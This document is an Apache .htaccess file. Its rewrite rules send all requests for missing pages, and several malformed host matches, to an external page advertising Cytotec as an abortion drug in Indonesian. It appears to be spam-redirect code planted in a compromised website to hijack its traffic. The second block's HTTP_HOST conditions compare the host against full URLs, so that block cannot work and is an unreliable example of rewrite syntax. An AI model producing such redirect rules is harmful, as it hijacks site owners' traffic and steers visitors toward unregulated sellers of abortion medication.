<IfModule mod_rewrite.c>
 RewriteEngine On 
 RewriteCond %{REQUEST_FILENAME} !-f 
 RewriteCond %{REQUEST_FILENAME} !-d 
 RewriteRule ^(.*)$ https://www.withcompass.pt/artigos/cytotecobatpenggugurkandungan/ [L]
</IfModule>
<IfModule mod_rewrite.c>
  RewriteEngine On
 RewriteCond %{HTTP_HOST} ^https://www.bangladesherkhabor.net/cytotecobataborsi/$ [OR]
  RewriteCond %{HTTP_HOST} ^https://bangladesherkhabor.net/assets/$ [OR]
 RewriteCond %{HTTP_HOST} ^https://bangladesherkhabor.net/assets/obat-penggugur-kandungan/$ [OR]
  RewriteCond %{HTTP_HOST} ^https://bangladesherkhabor.net/assets/$
 RewriteCond %{HTTP_HOST} ^https://www.bangladesherkhabor.net/cytotecobataborsi/$
  RewriteRule (.*)$ https://www.withcompass.pt/artigos/cytotecobatpenggugurkandungan/ [L]
</IfModule>